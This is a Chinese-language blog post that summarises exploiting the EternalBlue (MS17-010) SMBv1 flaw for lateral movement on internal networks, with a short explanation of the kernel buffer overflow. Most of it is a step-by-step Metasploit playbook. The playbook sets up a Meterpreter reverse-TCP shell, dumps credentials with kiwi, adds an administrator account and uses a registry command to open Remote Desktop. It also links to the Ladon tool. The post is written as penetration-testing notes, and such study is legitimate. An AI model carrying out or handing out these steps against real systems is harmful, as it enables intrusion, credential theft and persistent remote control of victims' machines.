• 渗透测试-内网横向MS-17010利用方法总结


    原理介绍

    永恒之蓝(ms17-010)过TCP端口445和139
    来利用SMBv1 SMB 协议 即 SMBv1 全名: Server Message Block
    和NBT中的远程代码执行漏洞,
    恶意代码会扫描开放445文件共享端口的Windows机器,
    无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

    漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt
    在处理FEA(File Extended Attributes)转换时,
    在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。

    函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。
    然后会进行如下操作:
    srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小
    因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大
    因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出

    目前已知受影响的Windows 版本包括但不限于:
    WindowsNT,2000、 XP、 2003、Vista、 7、 8,2008、2008 R2、2012 SP0。

    漏洞利用

    MSF

    搜索ms17_010漏洞:search ms17_010
    进入漏洞模块: use exploit/windows/smb/ms17_010_eternalblue
    查看漏洞模块信息:info
    设置攻击目标:set RHOSTS 172.16.7.180
    查看可用的攻击payload:show payloads
    选择并设置攻击Payload:set payload windows/x64/meterpreter/reverse_tcp
    设置接收信息的本地设备:set LHOST 172.16.7.95 and port
    最后检查下当前的配置:show options
    开始攻击:exploit
    直接拿到目标的Shell,然后任意命令执行
    获取用户密码
    load kiwi
    进程迁移
    creds_all
    shell切换到控制机dos界面
    创建新用户
    提升至管理员权限
    输入 net localgroup administrators查看管理员都有谁
    开启 远程桌面控制

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    
    • 1

    rdesktop x.x.x.x:3389

    Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets

    Ladon

    http://k8gege.org/Ladon/cmddll.html

    https://blog.csdn.net/k8gege/article/details/112253408

  • 相关阅读:
    Acwing 906. 区间分组
    Gartner发布中国科技报告:数据编织和大模型技术崭露头角
    华为设备流量抑制及风暴控制配置命令
    JavaWeb项目(二)
    【1093. 大样本统计】
    CSMACD协议与CSMACA协议
    网工内推 | 上市公司,云平台运维,IP认证优先,13薪
    什么是过期域名?做网站用过期域名好不好?
    数据通信网络之IPv6静态路由
    C/C++ 经典面试算法题
  • 原文地址:https://blog.csdn.net/qq_33608000/article/details/126574883